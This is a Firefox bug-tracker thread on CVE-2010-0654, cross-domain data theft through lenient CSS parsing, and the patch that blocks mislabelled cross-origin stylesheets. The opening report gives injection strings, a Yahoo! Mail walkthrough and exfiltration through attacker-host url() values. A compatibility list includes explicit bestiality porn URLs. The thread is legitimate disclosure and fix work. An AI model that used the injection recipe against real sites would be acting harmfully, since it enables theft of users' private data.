Closed Bug 524223 (CVE-2010-0654) Opened 15 years ago Closed 15 years ago

Cross-domain data theft using CSS

Categories

(Core :: CSS Parsing and Computation, defect, P1)

defect

Tracking

()

RESOLVED FIXED
Tracking Status
blocking2.0 --- alpha1+
blocking1.9.2 --- needed
status1.9.2 --- .5-fixed
blocking1.9.1 --- needed
status1.9.1 --- .11-fixed

People

(Reporter: ladamski, Assigned: zwol)

References

Details

(4 keywords, Whiteboard: [sg:moderate])

Attachments

(5 files, 10 obsolete files)

21.64 KB, patch
Details | Diff | Splinter Review
30.79 KB, patch
Details | Diff | Splinter Review
63.23 KB, patch
Details | Diff | Splinter Review
64.42 KB, patch
dbaron
: review+
Details | Diff | Splinter Review
55.02 KB, patch
Details | Diff | Splinter Review
From Chris Evans:

The attack involves cross-domain CSS stylesheet loading. Because the CSS
parser is very lax, it will skip over any amount of preceding and following
junk, in its quest to find a valid selector. Here is an example of a valid
selector:

body { background-image: url('http://www.evil.com/blah'); }

If a construct like this can be forced to appear anywhere in a cross-domain
document, then cross-domain theft may be possible. The attacker can introduce
this construct into a page by injecting two strings:

1) {}body{background-image:url('http://google.com/
(Note that the seemingly redundant {} is to resync
the CSS parser to make sure the evil descriptor parses properly. Further note
that having the url start like a valid url is required to steal the text in
some browsers).

2) ');}

Any anything between those two strings will then be cross-domain stealable! The
data is stolen cross domain with e.g.
window.getComputedStyle(body_element,
null).getPropertyValue('background-image');
(This works in most browsers; for IE, you use ele.currentStyle.backgroundImage)

There are a surprising number of places in internet sites where an attacker
can do this. It can apply to HTML, XML, JSON, XHTML, etc.

At this point, an example is probably useful. To set up for this example, you
need:
a) Get a Yahoo! Mail account.
b) Make sure you are logged into it.
c) E-mail the target victim Yahoo! account with the subject
');}
d) Wait a bit, so that some sensitive e-mails fill the inbox. (Or just simulate
one).
e) E-mail the target victim Yahoo! account with the subject
{}body{background-image:url('http://google.com/
f) Send victim to theft page
https://cevans-app.appspot.com/static/yahoocss.html
g) The stolen text shown is achieved via cross-domain CSS theft.

Other good examples I've had success with are social networking sites, where
the attacker gets to leave arbitrary-text comments which are rendered on the
victim's trusted page.

The main common construct that prevents exploitation is newlines.
Obviously, newlines cannot be considered a defense! Escaping or encoding of
quote characters can also interfere with exploitation. One useful trick: if '
is escaped, use " to enclose the CSS string.

Part 2 (on possible solutions) to follow.


Possible solutions.

First, there are some solutions it is easy to reject:

1) Restrict read of CSS text if it came from a different domain.
This is a useful defense that I filed a while ago in a different bug. But it
will not help in this case. The attacker can simply use
http://www.attacker.com/ as a prefix for the background-image value, and wait
for the HTTP GET to arrive which includes the stolen text in the payload.

2) Do not send cookies for cross-domain CSS loads.
This probably breaks a load of sites? It is certainly a riskier approach. I
have not dared try it!


The solution that I'm playing with is as follows:

- Activate "strict MIME type required" in the event that the CSS was loaded
(via link tag or @import) as a cross-domain resource.

- Also, crash hard if a CSS load fails due to strict MIME type test failure.

I've been running my build locally with these changes for a few days and there
seems to be some merit in this approach, i.e. my browser hasn't crashed apart
from when I hit my attack URLs.

I see that WebKit has a history of defaulting to "strict MIME type required"
for _all_ CSS loads, and that historically broke some sites like dell.com and
was reverted.
Perhaps the web at large now has its MIME types in order well enough to at
least enforce strict for cross-domain CSS loads? If too much breaks, we have
the additional level we can introduce of trying to parse the cross-domain CSS
but bailing on first syntax error. I'd like to avoid a test that is going that
deep into nuance, however.
Marking sg:moderate as it could lead to theft of confidential information but is mitigated by the need to inject attacker controlled content into page being viewed on victim site.
Whiteboard: [sg:moderate]
(In reply to comment #0)
> Perhaps the web at large now has its MIME types in order well enough to at
> least enforce strict for cross-domain CSS loads?

This seems like something that we could try.  Probably we'd
want to use the eTLD service, but we could avoid doing that until
we've already found that we loaded a stylesheet and it's not
text/css .

I suspect the big question would be whether sites like akamai send
the correct MIME type reliably.

The other question is whether we'd have a problem with the things
that we now accept in standards mode: empty content-type and
UNKNOWN_CONTENT_TYPE, and whether we'd need to change our handling
of those in order to prevent this attack.  (Probably not in most
cases, but there could be some; then again, one could easily argue
it's a bug in the site if it's putting content it wants interpreted
in a specific way in a response with no Content-Type specified.)


The relevant code is in SheetLoadData::OnStreamComplete in
nsCSSLoader.cpp, though we probably also have to worry about the
 hint type set in CSSLoaderImpl::LoadSheet.  Boris might know more.
Component: Security → Style System (CSS)
QA Contact: toolkit → style-system
OS: Mac OS X → All
Hardware: x86 → All
An update. I've crunched some data on 500,000 URLs and will have a recommendation on how to close the hole without breaking compatibility shortly :)

Regarding comment #2 - I'd see it as a bug in a site if it had a missing content-type, or a poorly specified content type.
I fixed this properly in WebKit (pending review).

I mined 500,000 URLs to see what sort of cross-domain CSS load + MIME braindamage exists. There's a little bit, e.g. configure.dell.com loading text/plain CSS. A bunch of sites do this. A bunch of other sites load application/octet-stream CSS and even a fair bit of text/html CSS.

Therefore, the solution devised was:
- Reject a CSS load if all of these are met:
a) It is cross-domain load (making sure a redirect does not confuse the domain check)!
b) Not a valid MIME type (text/css, application/x-unknown-content-type or empty).
c) The alleged CSS does not start with a syntactically valid CSS construct.

The above rules will block the attack because an HTML, XML etc. header will always cause a broken first CSS descriptor.

And the above rules are compatible. Out of the 500,000 URLs, just one very broken site has its look changed a little by this change: http://practiceexam.keys2drive.ca/quiz.php which does cross-domain CSS load for a text/html resource which has a CSS resource after a <style> tag. That is highly broken.

Regarding disclosure, there is no particular co-ordination. Fix and disclose when you are ready. Please credit "Chris Evans, Google Security Team".
This issue will be disclosed no later that 16th April 2009, and quite probably a lot sooner.
(In reply to comment #4)
> This issue will be disclosed no later that 16th April 2009, and quite probably
> a lot sooner.

16th April 2010, I hope you mean?
blocking1.9.1: --- → ?
status1.9.1: --- → ?
Flags: wanted1.9.0.x?
Flags: blocking1.9.2?
(In reply to comment #0)
> At this point, an example is probably useful. To set up for this example, you
> need:
> a) Get a Yahoo! Mail account.
> b) Make sure you are logged into it.
> c) E-mail the target victim Yahoo! account with the subject
> ');}
> d) Wait a bit, so that some sensitive e-mails fill the inbox. (Or just simulate
> one).
> e) E-mail the target victim Yahoo! account with the subject
> {}body{background-image:url('http://google.com/
> f) Send victim to theft page
> https://cevans-app.appspot.com/static/yahoocss.html
> g) The stolen text shown is achieved via cross-domain CSS theft.

I think, in a conformant CSS implementation, this will only work if there are no newlines or single quotes between the content from (e) and the content from (c), so the attack is rather constrained (though still, I think, worth fixing).
@5: Yes, 16th April 2010 as an upper bound. I wouldn't be surprised if WebKit-based browsers update sooner, though, since the WebKit patch should land tonight. I also worry that people monitor WebKit commits for additions to the LayoutTests/http/tests/security directory.

@6: Correct about newlines. Single quotes do not pose a problem for the attacker, as there is the option to enclose the CSS string within double quotes. A single quote within a double quote (and visa versa) is fine.
Also, I've found that "no newlines" is quite common in data access APIs that spit out authenticated data as JSON or XML.
blocking1.9.1: ? → needed
Flags: wanted1.9.0.x? → wanted1.9.0.x+
Whiteboard: [sg:moderate] → [sg:moderate] disclosure upper bound April 2010, but webkit fix checked in
Not blocking 1.9.2, but we should definitely come up with a fix ASAP and backport that fix to some 1.9.2 update.

The plan in comment #4 looks good to me.

Zack, can you take this?
Flags: blocking1.9.2? → blocking1.9.2-
Sure, I'm already messing with the CSSLoader, this shouldn't be too hard.  @cevans: would you be willing to let us have the tests you wrote for webkit, & if so, could you attach them to this bug?
This is an incomplete patch.  It compiles, and it contains the code necessary to detect the conditions laid out in comment #4 and notify the parser, but I haven't actually made the parser do anything with this yet.  That's going to be rather longer and less interesting, alas.

I'm asking for review on this because I'm not sure I did the cross-domain check correctly nor in all the places where it needs to happen.

Tangentially, this patch (as with anything that touches nsICSSParser) is going to conflict with my changes in bug 523496.  I'd kinda like to land that first.
Assignee: nobody → zweinberg
Status: NEW → ASSIGNED
Attachment #411763 - Flags: review?(bzbarsky)
Comment on attachment 411763 [details] [diff] [review]
partial patch (CSSLoader changes only)

This doesn't actually work right, since you're doing the same-origin check before you start the load.  In particular, the attacker could link to his own server (same-origin for purposes of this check) and then issue an HTTP 3xx response to redirect to the server being attacked.  The code here wouldn't detect that.

A better way to handle this, probably is to compare mLoaderPrincipal (which is the principal of the entity that started the load) to |principal| (which is the principal of the stylesheet, now that we've got its data and know exactly where that came from) in SheetLoadData::OnStreamComplete.  Presumably a Subsumes() check.  Note that mLoaderPrincipal may be null, in which case the load wasn't triggered on behalf of any web page and should be allowed.
Attachment #411763 - Flags: review?(bzbarsky) → review-
Oh, and if you want to land this on branches you need a version that doesn't go on top of bug 523496 anyway, right?
As requested, I'll upload the WebKit patch (including test) that is currently in-review.
An update on disclosure: Since this is a tricky issue, there will be guaranteed no disclosure prior to Dec 28th 2009.

If you want to fix this sooner than then -- please do, and push your fix out to users. Just refrain from mentioning this in the release notes or security notes. Non-prominent disclosure via source repository comments is fine.
Whiteboard: [sg:moderate] disclosure upper bound April 2010, but webkit fix checked in → [sg:moderate] embargoed until at least 2009-12-28, possibly as long as Apr-2010. webkit fix checked in
(In reply to comment #11)
> (From update of attachment 411763 [details] [diff] [review])
> This doesn't actually work right, since you're doing the same-origin check
> before you start the load.  In particular, the attacker could link to his own
> server (same-origin for purposes of this check) and then issue an HTTP 3xx
> response to redirect to the server being attacked.  The code here wouldn't
> detect that.

I was afraid there might be a problem like that.  Thanks.

> A better way to handle this, probably is to compare mLoaderPrincipal (which is
> the principal of the entity that started the load) to |principal| (which is the
> principal of the stylesheet, now that we've got its data and know exactly where
> that came from) in SheetLoadData::OnStreamComplete.  Presumably a Subsumes()
> check.  Note that mLoaderPrincipal may be null, in which case the load wasn't
> triggered on behalf of any web page and should be allowed.

Ok.  That should be less invasive, too, which is nice. 

I see that in some circumstances mLoaderPrincipal may be a null *pointer*, but do I have to worry about null *principals* in here as well?

(In reply to comment #12)
> Oh, and if you want to land this on branches you need a version that doesn't go
> on top of bug 523496 anyway, right?

Bleah, good point.  I'll keep developing it in isolation then.
(In reply to comment #16)
> I see that in some circumstances mLoaderPrincipal may be a null *pointer*, but
> do I have to worry about null *principals* in here as well?

|principal| is guaranteed non-null here, after the early-return branch that logs "couldn't get principal" has not been taken.  I assume that's what you were asking about?

If you were asking about nsNullPrincipal, then you don't need to worry about it.  mLoaderPrincipal (and |principal|, for that matter) may be nsNullPrincipal and that's ok.  The security checks will do the right thing with that.
(In reply to comment #17)
> If you were asking about nsNullPrincipal, then you don't need to worry about
> it.  mLoaderPrincipal (and |principal|, for that matter) may be nsNullPrincipal
> and that's ok.  The security checks will do the right thing with that.

Yes, I was asking about nsNullPrincipal.  Thanks for clarifying.

My other big concern at this stage is here:

@@ CSSLoaderImpl::LoadSheet
-    rv = ParseSheet(converterStream, aLoadData, completed);
+    // XXX Can we ever have a cross-domain, improper-MIME, synchronous load?
+    rv = ParseSheet(converterStream, aLoadData, completed, PR_FALSE);

I'm not clear on how synchronous loads get triggered or what they're used for.  Other things in this function imply that they are only for UA sheets, so we don't have to worry about cross-domain, but I'm not sure.
(In reply to comment #18)
> I'm not clear on how synchronous loads get triggered or what they're used for. 

LoadSheetSync is a public nsICSSLoader API, so any C++ code that really wants to can use it...

Current consumers in mozilla-central (excluding tests) are:

* nsChromeRegistry: should only happen for chrome:// URIs
* nsHTMLEditor: should only happen for editor-provided URIs
* nsLayoutStyleSheetCache: scrollbars.css, forms.css, ua.css, quirk.css,
                           userContent.css, useChrome.css
* nsStyleSheetservice: extension-provided UA and user sheets
* nsDocumentViewer: usechromesheets attribute on chrome <xul:browser/iframe>
* nsXBLPrototypeResources: chrome:// URIs only.
* nsXBLResourceLoader: chrome:// URIs only.
* nsXMLContentSink: catalog sheets only (in practice, mathml.css)
* nsDocument: catalog sheets

If LoadSheetSync ever gets a URI under control of untrusted content that's a serious bug, fwiw.
Attached patch complete patch (obsolete) — Splinter Review
Here's a complete patch with the necessary parser changes and tests.  I'm not sure I implemented exactly the same parsing semantics that cevans did for Webkit, but I doubt that the precise rules matter too much.  If anyone can suggest a way to avoid adding 48 tiny little files to layout/style/tests I am all ears.

A remaining concern: does the error cleanup logic in SheetComplete() ensure that Javascript never sees the aborted sheet, or do we need to undo actions in the parser as well?
Attachment #411763 - Attachment is obsolete: true
Attachment #412759 - Flags: superreview?(dbaron)
Attachment #412759 - Flags: review?(bzbarsky)
Comment on attachment 412759 [details] [diff] [review]
complete patch

I think I'd prefer s/raconian/raconianParsing/ throughout in variable and argument names.

>+++ b/layout/style/nsCSSParser.cpp
>+// Draconian error handling is a nonstandard mode used to close a
>+// data-theft loophole.  A quirks mode document can declare any Web
>+// resource to be its style sheet; regardless of that resource's MIME
>+// type, we'll try to parse it as CSS.  The normal CSS error recovery
>+// rules give the attacker a fairly decent chance of finding a valid
>+// style rule or two in there

Not sure how much of that comment we should leave in when we land if we're trying to not disclose this bug... I guess there's nothing there that describes the actual technique used here, but still please double-check with Chris?

> and the text of that rule then becomes
>+// accessible to the attacking document via the CSSOM.

As a matter of fact, no it does not.  We enforce same-origin checks on CSSOM access.  What the attack here does is to get parts of the data in the attacked document into a url() production, at which point the browser sends it to a server of the attacking document's choise as part of a GET.

>+  // XXX If draconian error handling triggered, should we undo all changes
>+  // to the style sheet?  nsI[CSS]StyleSheet doesn't have methods for that...

We probably need to do that, yes.  Add a method?  It can throw if the sheet is complete, to make sure no one but us uses it.

As far as that goes, we might kick off @import loads before we hit a parse error.  Do we want to abort them?  They could in theory be communicating information to the server...  But again, check with Chris?  It sounds like his patch only aborts if the first rule it tries to parse doesn't parse; once it's parsed a rule it just follows normal CSS error-recovery.  That would seem to be sufficient to me.

I didn't look at the tests very carefully.

> does the error cleanup logic in SheetComplete() ensure that Javascript never
> sees the aborted sheet

It does not, however in the cross-domain case JS can't access the sheet's rules directly anyway, per above.
(In reply to comment #21)
> (From update of attachment 412759 [details] [diff] [review])
> I think I'd prefer s/raconian/raconianParsing/ throughout in variable and
> argument names.

Ok.

> >+++ b/layout/style/nsCSSParser.cpp
> >+// Draconian error handling is a nonstandard mode [...]
> 
> Not sure how much of that comment we should leave in when we land if we're
> trying to not disclose this bug... I guess there's nothing there that
> describes the actual technique used here, but still please double-check
> with Chris?

Well, he's reading the bug... Chris?

 
> > and the text of that rule then becomes
> >+// accessible to the attacking document via the CSSOM.
> 
> As a matter of fact, no it does not.  We enforce same-origin checks on CSSOM
> access.

Huh, Chris said in the original description that it's a JS-based attack:

# The data is stolen cross domain with e.g.
# window.getComputedStyle(body_element, null)
#  .getPropertyValue('background-image');
# (This works in most browsers; for IE, you use
#  ele.currentStyle.backgroundImage)

Maybe getComputedStyle is not a "CSSOM" access in the strict sense...?

> What the attack here does is to get parts of the data in the attacked
> document into a url() production, at which point the browser sends it to a
> server of the attacking document's choise as part of a GET.

The existing patch may not protect against that scenario, depending on when the GET fires.  I *think* it never happens during parse, except maybe for @font-face, but I'm not sure that's a safe "except".

> >+  // XXX If draconian error handling triggered, should we undo all changes
> >+  // to the style sheet?  nsI[CSS]StyleSheet doesn't have methods for that...
> 
> We probably need to do that, yes.  Add a method?  It can throw if the sheet is
> complete, to make sure no one but us uses it.

It occurs to me that the only things that will get into the style sheet are from syntactically valid constructs preceding the first syntax error.  It kinda sounded like Chris's proposal was for a weaker rule than the one I implemented: if the *first* construct in the document is ill-formed, bail out, otherwise do normal CSS error recovery.  I could change it to be like that, and then we wouldn't need this additional sheet-rollback handling.  But I'm not sure it's enough protection.  Chris, what exactly did you make Webkit do?  I'm not familiar enough with Webkit's CSS parser to tell from the patch.
> Maybe getComputedStyle is not a "CSSOM" access in the strict sense...?

Ah, yeah.  That's true.  You can't access the rules directly, but you can observe their effect on the computed style...

> I *think* it never happens during parse

@import gets happen during parse.  Or at least the channel's asyncOpen is called during parse.  @font-face is not.

> It occurs to me that the only things that will get into the style sheet are
> from syntactically valid constructs preceding the first syntax error.

Yes.

> It kinda sounded like Chris's proposal was for a weaker rule

That's the impression I got too.  Looking at the attached webkit patch, that seems to be exactly what's going on to me:

+    if (m_styleSheet && !m_hadSyntacticallyValidCSSRule)
+        m_styleSheet->setHasSyntacticallyValidCSSHeader(false);

(in "invalid block hit") and then:

+    if (crossOriginCSS && !validMIMEType && !m_sheet->hasSyntacticallyValidCSSHeader())
+        m_sheet = CSSStyleSheet::create(this, url, charset);

(which replaces m_sheet with a blank sheet).  I'm not sure what sets m_hadSyntacticallyValidCSSRule; that part seems to be autogenerated lexer code.
@Zack, #22: feel free to commit whatever comments you want. If news breaks out, then so be it. Co-oridating something like this across a million browser vendors (some of whom move at glacier speeds) is just too complicated.

@Boris, Zack #22 & #23: it's not necessarily a JS-based attack. My demo is JS-based because that is the easiest demo. However, imagine if getComputedStyle() did not exist. The attacker can still steal the same data because the background-image URL fetch will send the data in the GET request to evil.com.
On Mon, Nov 23, 2009 at 10:55 AM, Zack Weinberg <zweinberg@mozilla.com> wrote:
> I'm still a little confused about one nuance of the CSS cross-site data
> theft mitigation you proposed in Mozilla bug 524223.  Suppose that we
> load a cross-domain URI as a style sheet, it has the wrong MIME type,
> the *first* complete construct in the file is a valid CSS rule but
> there's a syntax error after that point.  Should we still disregard the
> whole sheet?  Or should we revert to regular CSS error handling if the
> first complete construct is well-formed?

The latter. The check is, in concept, a "header" check.

Also, we distinguish a syntax error from a sematic error (such as
unknown property). The latter should not be considered an error.
Comment on attachment 412759 [details] [diff] [review]
complete patch

I've thought about this for a bit, and I've decided that I don't like the idea of having different behavior based on whether the first rule (or entirety) of a style sheet parses correctly.

The first reason that I think this is bad is that I think, in general, heuristics are bad platform.  By heuristics, I mean complex mechanisms intended to devine intent out of existing content on the Web (such as what Opera does with media="handheld", or this).  While they're fine at handling existing content (and that's what they're designed for), I think they're bad for two reasons:  (1) they provide a bizarre API for future authors, who become unable to build a mental model of how the Web as a platform behaves, and (2) it makes it more complex for new entrants in the Web browser market, since they have to reverse-engineer these heuristics for compatibility with existing content.

Second, I don't like the implications of such a change for CSS error handling rules.  CSS depends for future extensibility on the idea that new constructs added to the language will be skipped in well-defined ways.  Taking this approach would break this and make Web authors much more hesitant to use future CSS language constructs as they are added, for fear of causing entire stylesheets to be ignored in older browsers that don't support those constructs.

So, on that basis, I'm denying superreview.


Instead, I think that we should take a slightly bigger short-term risk (for longer-term gain) and stop processing all cross-domain stylesheet loads with mismatched MIME types.
Attachment #412759 - Flags: superreview?(dbaron) → superreview-
(In reply to comment #26)
> Instead, I think that we should take a slightly bigger short-term risk (for
> longer-term gain) and stop processing all cross-domain stylesheet loads with
> mismatched MIME types.

I'm happy with this, and will add that I was not enthusiastic about being able to get the parser changes required for cevans' proposed rule into 3.6.x.  Your somewhat more strict rule, on the other hand, is much easier to implement with the parser we've got (indeed, it requires no changes to nsCSSParser at all).

cevans: from that data set you crunched, how many sites were doing MIME-mislabeled, cross-domain loads of *syntactically valid* CSS?
I'll paste in the list of URLs. This list is for URLs I found that do cross-domain CSS loads with invalid MIME type. It's 83 URLs out of about 500,000. In the majority of cases, the CSS is syntactically valid. I think about 3 of those 83 returned syntactically _in_valid CSS in the form of CSS surrounded by <style> and a text/html MIME type.

Note that breaking all of these URLs would have consequences. For example, configure.dell.com is regrettably broken and uses the text/plain MIME type for cross-domain CSS in its "configure your PC" pages. That would be a significant breakage. Although presumably dell.com would fix it pretty damn pronto if their broken-yet-money-making site started failing to render in a browser as popular as Firefox.

Also beware that some of these URLs are porn URLs with pretty rough content. Well, I think that's clear from the text in the URLs themselves :-)

http://ads.lfstmedia.com/fbslot/slot328
http://apps.facebook.com/eltabaco/index.php
http://apps.facebook.com/yoursay/
http://configure.dell.com/dellstore/config.aspx
http://configure.la.dell.com/dellstore/config.aspx
http://configure.la.dell.com/dellstore/poll.aspx
http://configure.us.dell.com/dellstore/DiscountDetails.aspx
http://configure.us.dell.com/dellstore/config.aspx
http://configure.us.dell.com/dellstore/print_summary_details_popup.aspx
http://date.bluesystem.ru/
http://date.bluesystem.ru/login.php
http://date.bluesystem.ru/members/
http://date.bluesystem.ru/members/who_viewed.php
http://date.bluesystem.ru/messages/
http://date.bluesystem.ru/messages/msgs.php
http://date.bluesystem.ru/photo/
http://date.bluesystem.ru/search.php
http://date.bluesystem.ru/view.php
http://date.bluesystem.ru/view_sex.php
http://forms.real.com/real/player/blackjack.html
http://forms.real.com/real/realone/realone.html
http://forum.derwesten.de/viewtopic.php
http://info.smmail.cn/jsp/service/LoginInterFace.jsp
http://jplanner.travelinenortheast.info/jpclient.exe
http://media.paran.com/entertainment/newslist.php
http://media.paran.com/entertainment/newsview.php
http://media.paran.com/sdiscuss/newshitlist.php
http://media.paran.com/sdiscuss/newsview2.php
http://media.paran.com/snews/newslist.php
http://media.paran.com/snews/newsview.php
http://month.gismeteo.ru/
http://month.gismeteo.ru/forecast.php
http://news.gismeteo.ru/news.n2
http://practiceexam.keys2drive.ca/quiz.php
http://search.chl.it/search.aspx
http://search.vampirefreaks.com/search_results.php
http://story.bluesystem.org/read.php
http://submit.123rf.com/submit/myuploaded.php
http://telefilmdb.blogspot.com/
http://www.aif.ru/
http://www.art.com/gallery/id--0/posters_p2.htm
http://www.baseball-reference.com/
http://www.baseball-reference.com/minors/player.cgi
http://www.baseball-reference.com/pl/player_search.cgi
http://www.edurang.net/uview/wrd/run/portal.show
http://www.fantatornei.com/calcio/fantalega/gestionelega.asp
http://www.google.es/ig/setp
http://www.homeportfolio.com/catalog/Listing.jhtml
http://www.pleshka.com/
http://www.smmail.cn/smmail/sy/index.html
http://www.tabelas.lancenet.com.br/Default.aspx
http://www.thongsdaily.com/
http://www.zootube365.com/
http://www.zootube365.com/animal-sex/1/
http://www.zootube365.com/animal-sex/horse-and-woman/1446/
http://www.zootube365.com/animal-sex/rochdale----does-her-pony/9740/
http://www.zootube365.com/animal-sex/woman-raped-by-pig-and-dog/2129/
http://www.zootube365.com/dog-sex/3/
http://www.zootube365.com/dog-sex/3/page/2/
http://www.zootube365.com/dog-sex/3/page/3/
http://www.zootube365.com/dog-sex/3/page/4/
http://www.zootube365.com/dog-sex/dog-cum00/11850/
http://www.zootube365.com/dog-sex/dog-****-woman-firsttime/293/
http://www.zootube365.com/dog-sex/stuck-on-the-knot/1827/
http://www.zootube365.com/forum.html
http://www.zootube365.com/horse-sex/2/
http://www.zootube365.com/horse-sex/2/page/2/
http://www.zootube365.com/horse-sex/horse-try-woman-1/202/
http://www.zootube365.com/horse-sex/horsegirlcum/11487/
http://www.zootube365.com/horse-sex/linda-and-pony/191/
http://www.zootube365.com/latest.html
http://www.zootube365.com/latest/page/12/
http://www.zootube365.com/latest/page/13/
http://www.zootube365.com/latest/page/2/
http://www.zootube365.com/latest/page/4/
http://www.zootube365.com/latest/page/6/
http://www.zootube365.com/latest/page/7/
http://www.zootube365.com/login.html
http://www.zootube365.com/payment_start.html
http://www.zootube365.com/register.html
http://www.zootube365.com/search.html
http://www.zootube365.com/top.html
http://zootube365.com/
What definition of "cross domain" was used for generating that list?  Were the relevant dell.com stylesheets hosted on another subdomain of dell.com, or elsewhere?
"cross domain" as in the classic same origin policy case. i.e. a.dell.com != b.dell.com

(As an aside, I find all areas where the web model gives subtle extra privs between shared subdomains to be distasteful. Examples include the ability to interfere via setting domain cookies, and the "third party cookie" concept).

In the case of the dell.com site breakage, it appears that configure.dell.com is loading CSS from configure-cdn.dell.com as text/plain.
I don't have a full breakdown, but some of the example weren't a.blah.com vs. b.blah.com. I can't remember which ones, but some of the porn sites were loading CSS from a raw IP (?!) and I think it was application/octet-stream MIME type.

It is true that you likely could cover most (all?) of the cases with a combination of subdomain tricks plus maybe MIME type exemptions. You'd need to resample the above list. I don't have the data in the form "domain, CSS domain, MIME type" unfortunately.
Attachment #412759 - Flags: review?(bzbarsky)
This patch implements dbaron's more aggressive proposal of disallowing *any* cross-domain load with an improper MIME type.

It looks to me like the number of *sites* affected is quite small -- maybe only ten or so out of cevans' data set -- so that seems to me like we could reasonably punt to evangelism. How about we put this in 3.6.0 and see how loud the screaming is?

Note: I'm on vacation from Wednesday evening until the first week of January.
Attachment #412759 - Attachment is obsolete: true
Attachment #418733 - Flags: superreview?(dbaron)
Attachment #418733 - Flags: review?(bzbarsky)
FYI to reviewers: There is reindentation in the patch, the actual lines of code changed in nsCSSLoader are very few.  Also, I redid the test case to generate all the little CSS fragments we need out of an .sjs file rather than put them in CVS.  There's still an awful lot of repetition in the test case proper (ccd-{quirks,standards}.html) but there's not much we can do about that.
Here's a diff of nsCSSLoader.cpp ignoring the reindentation.  (This is the only file with code changes.)
Attachment #418737 - Attachment is patch: true
@Zack -- out of interest, what definition of "cross-domain" did you go with in the end (e.g. www.dell.com vs. configure.dell.com)?

I'd imagine people would be irritated if they couldn't customize Dell machine configurations any more.

On the other hand... congrats on FF3.5 becoming the single most popular browser out there! That's awesome, and gives leverage to request broken sites fix themselves. Doing the change more strictly is probably the right thing to do, and any e-commerce site is going to fix their broken MIME types pronto if it stops working well in FF.
(In reply to comment #34)
> @Zack -- out of interest, what definition of "cross-domain" did you go with in
> the end (e.g. www.dell.com vs. configure.dell.com)?

The strict one.  Or, more accurately, the default one, which happens to be strict.

> I'd imagine people would be irritated if they couldn't customize Dell machine
> configurations any more.

I was thinking that we should at least contact the sites on your list and give them a heads-up before the patch lands.  And this will need to be very clearly relnote-d.  Which maybe means we need to backport it to 3.5 and 3.0 to avoid the "black hat uses our relnotes as a cookbook" thing.
Comment on attachment 418733 [details] [diff] [review]
patch v2: quirks mode improper MIME type style loads must be same origin

r=bzbarsky, but as long as you're making the logging not suck how about:

 LOG_WARN(("  Ignoring sheet with improper MIME type %s", contentType.get()));

?
Attachment #418733 - Flags: review?(bzbarsky) → review+
I remember thinking I should do that, but then I forgot to actually do it.

Changed in my copy.
Comment on attachment 418733 [details] [diff] [review]
patch v2: quirks mode improper MIME type style loads must be same origin

Did you check that the test for bug 397427 still fails if you locally revert that bug's fix?  (And likewise for your own tests?)

sr=dbaron
Attachment #418733 - Flags: superreview?(dbaron) → superreview+
@Zack, #35: feel free to mention this in the release notes whenever 3.6 makes it out (and even if that happens before the 28th).
And, in particular, did you test that your test fails both for incorrect ignoring and for incorrect using of style sheets?
(In reply to comment #39)
> @Zack, #35: feel free to mention this in the release notes whenever 3.6 makes
> it out (and even if that happens before the 28th).

This is unlikely to make 3.6.
But we'll probably end up backporting this to some stable 3.6 release, *after* we've dealt with the site compatibility fallout.
(In reply to comment #38)
> (From update of attachment 418733 [details] [diff] [review])
> Did you check that the test for bug 397427 still fails if you locally revert
> that bug's fix?  (And likewise for your own tests?)

I did not.  Will try that first thing tomorrow.
I didn't revert the entire patch for bug 397247, but I did change both calls to SetURIs() in nsCSSLoader to not pass the specially-calculated "original URL".  This makes six of the 18 tests in test_bug397247.html fail:

failed | href should be null - got "http://localhost:8888/tests/layout/style/test/test_bug397427.html", expected null
failed | should be actual null - got "string", expected "object"
passed | Redirect 1 did not work
passed | Redirect 1 did not get right base URI
passed | Redirect 2 did not work
passed | Redirect 2 did not get right base URI
passed | Redirect 3 did not work
passed | Redirect 3 did not get right base URI
failed | Unexpected href for imported sheet - got "http://example.org/tests/layout/style/test/post-redirect-1.css", expected "http://localhost:8888/tests/layout/style/test/redirect.sjs?http://example.org/tests/layout/style/test/post-redirect-1.css"
todo | Rule href should be absolute - got "redirect.sjs?http://example.org/tests/layout/style/test/post-redirect-1.css", expected "http://localhost:8888/tests/layout/style/test/redirect.sjs?http://example.org/tests/layout/style/test/post-redirect-1.css"
failed | Unexpected href for imported sheet - got "http://example.org/tests/layout/style/test/post-redirect-2.css", expected "http://localhost:8888/tests/layout/style/test/redirect.sjs?http://example.org/tests/layout/style/test/post-redirect-2.css"
todo | Rule href should be absolute - got "redirect.sjs?http://example.org/tests/layout/style/test/post-redirect-2.css", expected "http://localhost:8888/tests/layout/style/test/redirect.sjs?http://example.org/tests/layout/style/test/post-redirect-2.css"
passed | Unexpected href one
passed | Should have the same href when not redirecting
passed | Unexpected href two
failed | Should have the same href when redirecting - got "http://localhost:8888/tests/layout/style/test/redirect.sjs?http://example.org/tests/layout/style/test/post-redirect-2.css", expected "http://example.org/tests/layout/style/test/post-redirect-2.css"
passed | Unexpected href three
failed | Should have the same href when redirecting again - got "http://localhost:8888/tests/layout/style/test/redirect.sjs?http://example.org/tests/layout/style/test/post-redirect-3.css", expected "http://example.org/tests/layout/style/test/post-redirect-3.css"

I believe, by inspecting the test, that the 10 remaining successes are all controls -- that is, they should succeed regardless of whether bug 397247 is fixed.
(In reply to comment #40)
> And, in particular, did you test that your test fails both for incorrect
> ignoring and for incorrect using of style sheets?

Yep.  In the version I'm about to commit, there are two debugging modes present (but disabled) in ccd.sjs that can be used to verify this.
Differences from previous edition are Boris' suggested change to the logging, and the aforementioned debugging modes in ccd.sjs.

http://hg.mozilla.org/mozilla-central/rev/b0cc8c093877
Attachment #418733 - Attachment is obsolete: true
Attachment #418737 - Attachment is obsolete: true
Blocks: 536606
Filed follow-up bug 536606 for the evangelism, and bug 536603 for an intermittent failure in the test case which smells like an httpd.js issue.  Also tagging for dev-docs -- this needs relnotes.

Release drivers: I think we need to give evangelism at least a month before this hits security updates; other than that, backport schedule is up to you.
Status: ASSIGNED → RESOLVED
Closed: 15 years ago
Keywords: dev-doc-needed
Resolution: --- → FIXED
Group: core-security
Whiteboard: [sg:moderate] embargoed until at least 2009-12-28, possibly as long as Apr-2010. webkit fix checked in → [sg:moderate]
I think we're making the right long-term decision here.  But to limit short-term damage to privacy/security without breaking sites too suddenly, perhaps we should take the yucky-heuristic patch on the 1.9.2 branch.

Does webkit plan to change to a more strict approach?
I don't know what WebKit's longer term plans are. It would indeed be nice to rip out the more subtle logic and just insist on a correct MIME type.
Whiteboard: [sg:moderate] → [sg:moderate][3.6.x]
Is it at all realistic to get this into Firefox 3.5.8, or is there too much risk of site breakage to land that quickly?
blocking1.9.1: needed → ?
